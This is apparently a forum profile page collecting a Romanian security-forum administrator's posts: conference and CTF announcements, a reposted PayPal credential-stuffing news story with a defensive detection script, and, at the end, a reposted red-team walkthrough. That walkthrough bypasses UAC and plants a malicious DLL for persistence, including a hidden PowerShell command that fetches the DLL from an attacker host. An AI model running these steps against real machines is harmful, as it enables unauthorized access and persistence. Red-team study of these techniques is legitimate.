Nytro
Administrators
Posts: 18659
Days Won: 680

Everything posted by Nytro

  1. Ready? It starts at 10:00: https://rstcon.com/
  2. $3 / hour, better than being employed at Mc. PS: You'd be better off looking at how the game communicates with the server and automating the process.
  3. REGISTRATION OPEN for the Romanian Cyber Security Challenge – RoCSC 2023: https://www.rocsc.ro/ #RoCSC is the National Cyber Security Championship, a CTF (capture the flag) competition held in two stages at national level and, at the same time, the official selection process for Romania's team - #TeamRomania - for the European Cyber Security Challenge, which will take place this year in October in Norway (24-27.10.2023). Participation is FREE, and young people passionate about cyber security will be able to demonstrate, at national level, their skills in areas such as mobile & web security, crypto, reverse engineering and forensics. Competitors will compete in 3 categories: Juniors (16-21 years old), Seniors (22-25 years old) and Open (available regardless of age). Moreover, in the categories eligible for selection (Juniors and Seniors) cash prizes will be awarded (places 1-3), as well as special prizes (places 4-10).
    DEADLINE for registration: 27 May 2023
    The preliminary qualifying stage will take place online, from 26.05 at 16:00 to 27.05 at 24:00 (32 hours)
    The ROCSC23 final will be held on-site, in Bucharest, on 22-23.07.2023
      • 1
      • Upvote
  4. RSTCon #3 will take place at the end of this week, on 27 and 28 April 2023 from 10:00 to 17:00, and the CTF contest will run from 29 April 2023 at 10:00 until 30 April 2023 at 17:00.
    - List of talks: https://lnkd.in/dbVbypGd
    - CTF platform: https://ctf.rstcon.com/
    - Event: https://lnkd.in/daRccaj6
    For more details: https://rstcon.com/ Like, share and subscribe 🤗
  5. Interesting, I missed this one, but I am familiar with https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
  6. That's why we do RSTCon, we're trying... I don't know whether such a ranking can be made; at present the question is "who pays more". More precisely, if companies and governments pay people well, nice research can come out of it, but most often it is "secret" (e.g. Snowden). From my point of view the USA and China are very involved, but I've been seeing more and more about North Korea. No idea about Russia; in the past they did things, nowadays they are probably not that "involved" anymore. I wonder the same thing, I don't know what's going on, I don't know what today's young people are doing. Politehnica Bucuresti used to produce good people with the Security Summer School, but it seems not many come out of there anymore either. I was involved in ECSC and it seems we don't really have Juniors, I don't know, maybe they all took up programming...
  7. From my point of view a book is ideal for learning the language. As for compiling, a tutorial should be enough to understand how to use an IDE. You can also use video tutorials, but look for "complete" ones that cover the subject in as much detail as possible. Try the platforms Udemy, Pluralsight or others; although they cost something, I don't consider it a high price.
  8. One more thing regarding the conference's Discord: it is NOT the RST Discord. I don't know what you do there and I don't care, but the conference and the CTF are serious, for those interested, so if you have nothing to do, find other activities instead of swearing on that Discord and making cheap jokes.
  9. The list of talks has been updated. Don't forget the CTF, we could use some exercises from you.
  10. The preliminary list of talks has been published and may change: https://rstcon.com/prezentari/ If there are people willing to create challenges for the CTF, I'm waiting for a sign.
  11. Armand Iliescu: "The unsung heroes" of online commerce: Visa has issued over 100 million tokens. In payments, tokens replace card data and turn it into a code that cannot be deciphered. Each token is unique, so it cannot be cracked or exploited by cybercriminals, thus protecting payment details. Tokens are generated automatically, for example when a user saves their card details in a streaming platform, at an online store or in the digital wallet on their smartphone. Several tokens can be generated for the same card - each of them has a unique number associated with it and can be used exclusively in the application or on the device in which it is stored. This is one of the reasons why Visa Token Service (VTS) has issued more than 100 million tokens in Central and Eastern Europe - a considerably higher number than that of physical Visa cards in the region. Full article: https://www.wall-street.ro/special/ecomteam/296165/eroii-necunoscuti-ai-comertului-online-visa-a-emis-peste-100-de-milioane-de-tokenuri.html?
  12. Last week in which those who want to present can sign up: https://rstcon.com/call-for-papers/
  13. Is anyone else offering to help with challenges?
  14. Nytro

    RSTCon #3 - CTF

    The Call for Papers is still open for anyone who wants to present: https://rstcon.com/call-for-papers/
  15. Silmarillion
  16. The simplest solution: don't do shady stuff and you won't need to anonymize yourself.
  17. Nytro

    RSTCon #3 - CTF

    We are waiting for CTF exercise proposals from you: https://ctf.rstcon.com/
  18. I've updated the Discord link: https://discord.gg/NEkCQHhZHQ We are waiting for your talk proposals: https://rstcon.com/call-for-papers/ Thanks @Zatarra for the generous donation.
  19. Nytro

    RSTCon #3 - CTF

    The CTF platform is available. Registrations are open: https://ctf.rstcon.com/
    Contest prizes:
    - 1st place: 4000 RON
    - 2nd place: 2000 RON
    - 3rd place: 1000 RON
    - Best write-up: 500 RON
    The prizes are funded by donations from community members. Those who can help us with a donation are asked to contact us at contact@rstcon.com. That way the prize amounts may end up higher. Also, if you would like to support us by creating CTF exercises, regardless of difficulty or topic, we await an email at contact@rstcon.com. For discussions about the CTF we will use the #ctf channel on Discord. The contest results will be presented at 16:00 on Discord. Full information: https://rstcon.com/ctf/ I'll be back with details.
  20. RST Con is a free online conference, in Romanian, brought to life by the RST community. The conference will take place on 27-28 April 2023 from 10:00 to 17:00, and the CTF contest will run from 29 April 2023 at 10:00 until 30 April 2023 at 17:00. The conference will be held on the Zoom platform. Registration and access to the event are available at the following addresses:
    RSTCon #3 – 27 April – Day I: https://us02web.zoom.us/webinar/register/WN_xKDZ0iklTjWeWcaH34VNsQ
    RSTCon #3 – 28 April – Day II: https://us02web.zoom.us/webinar/register/WN_0Y7IwXCjR4-U1Fcvyj4R9w
    Please note that the Zoom events are different on the two days. LinkedIn: https://www.linkedin.com/events/rstcon-37035364565479473152/about/ Full information at https://rstcon.com/ I'll be back with more information.
  21. I have 3 vaccine doses and because of them I've died about 2 times.
  22. Nice, in theory you could have taken it to RCE, but they've probably kept adding mitigations. Let us know how much they pay for it.
  23. Nytro

    Fun stuff

    https://9gag.com/gag/a4oEMp1
  24. PayPal accounts breached in large-scale credential stuffing attack
    By Bill Toulas, January 19, 2023

    PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data. Credential stuffing attacks are attacks in which hackers attempt to access an account by trying out username and password pairs sourced from data leaks on various websites. This type of attack relies on an automated approach with bots running lists of credentials to "stuff" into login portals for various services. Credential stuffing targets users that employ the same password for multiple online accounts, which is known as "password recycling."

    Close to 35,000 users impacted
    PayPal explains that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorized third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them. According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders' full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts. PayPal says it took timely action to limit the intruders' access to the platform and reset the passwords of accounts confirmed to have been breached.

    Also, the notification claims that the attackers have not attempted or did not manage to perform any transactions from the breached PayPal accounts. "We have no information suggesting that any of your personal information was misused as a result of this incident, or that there are any unauthorized transactions on your account," reads PayPal's notification to impacted users. "We reset the passwords of the affected PayPal accounts and implemented enhanced security controls that will require you to establish a new password the next time you log in to your account" - PayPal. Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts using a unique and long string. Typically, a good password is at least 12 characters long and includes alphanumeric characters and symbols. Moreover, PayPal advises users to activate two-factor authentication (2FA) protection from the 'Account Settings' menu, which can prevent an unauthorized party from accessing an account, even if they have a valid username and password.
    Source: https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/
      • 1
      • Upvote
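The defender-side check the article implies, as an added example that is not part of the original post or of PayPal's systems: a detector that flags a source address failing logins against many distinct accounts within a short window (the credential-stuffing pattern), run over constructed sample log lines in an assumed "time result user= ip=" format.

```python
"""Credential-stuffing detector over constructed authentication log lines.

A bot replaying leaked username/password pairs fails against many distinct
accounts from one source in a short window; a real user mistyping a password
fails repeatedly against one account. The detector keys on that difference."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real PayPal data): "<iso-time> <result> user=<name> ip=<addr>"
SAMPLE_LOG = """\
2022-12-06T10:00:01 FAIL user=alice ip=203.0.113.7
2022-12-06T10:00:02 FAIL user=bob ip=203.0.113.7
2022-12-06T10:00:02 FAIL user=carol ip=203.0.113.7
2022-12-06T10:00:03 OK user=dave ip=203.0.113.7
2022-12-06T10:00:04 FAIL user=erin ip=203.0.113.7
2022-12-06T10:00:05 FAIL user=frank ip=203.0.113.7
2022-12-06T10:00:09 FAIL user=alice ip=198.51.100.4
2022-12-06T10:00:10 FAIL user=alice ip=198.51.100.4
2022-12-06T10:00:11 OK user=alice ip=198.51.100.4
"""

def parse_line(line):
    """Split one log line into (timestamp, result, username, source ip)."""
    ts, result, user, ip = line.split()
    return datetime.fromisoformat(ts), result, user.split("=", 1)[1], ip.split("=", 1)[1]

def detect_stuffing(log_text, window=timedelta(minutes=5), min_users=5):
    """Return {ip: {"targeted": [...], "succeeded": [...]}} for each source ip whose failed
    logins hit >= min_users distinct accounts in a sliding window; "succeeded" = accounts to reset."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, result, user, ip = parse_line(line)
            by_ip[ip].append((ts, result, user))
    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, user) for ts, result, user in events if result == "FAIL"]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:  # slide the window forward
                start += 1
            users = {user for _, user in fails[start:end + 1]}
            if len(users) >= min_users:
                succeeded = sorted(user for _, result, user in events if result == "OK")
                findings[ip] = {"targeted": sorted(users), "succeeded": succeeded}
                break
    return findings
```

On the sample data only 203.0.113.7 is flagged (five distinct accounts in four seconds, one of which it then logged into); 198.51.100.4, a single user retrying their own password, is not.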
  25. assume-breach, Jan 20
    Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence

    Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we're going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right?

    Getting Started
    If you haven't read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we're going to start where we ended in our last article. Here's the scenario: we have an administrative beacon in medium integrity through Havoc C2. You'll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running "whoami" we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to "C:\Windows\" and this isn't accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity.

    Using A UAC Bypass To Perform Administrative Actions
    A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let's discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow:
    1. Target downloads malicious EXE.
    2. We run HighBorn in memory using inline-execute.
    3. HighBorn performs the UAC Bypass and calls the EXE in high integrity.
    4. We get a high integrity beacon.
    Since we are bypassing Applocker protections, we don't have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL.

    DLL Side Loading For Persistence
    I've seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let's begin by creating a malicious DLL.

    Creating The Malicious DLL
    To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you're on a real pentest) and I named my DLL appropriately for the exploit.

    Modifying HighBorn.cs For Administrative Actions
    Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use an easy Powershell command to download our cscapi.dll file into the Windows folder.

        powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll'

    However, if we try to compile this, we get escape sequence errors. Let's encode our command into Base64 using Powershell.

        $str = "powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll'"
        [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

    Now we should have a good Base64 string. Let's add it to the HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder.

        x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows

    Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command.

        mcs HighBorn.cs /out:HighBorn.exe

    We host secur32.dll and run our command in Havoc. On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let's reboot the target and see if we get a shell back. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user's system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach
    Source: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e
      • 2
      • Thanks
      • Upvote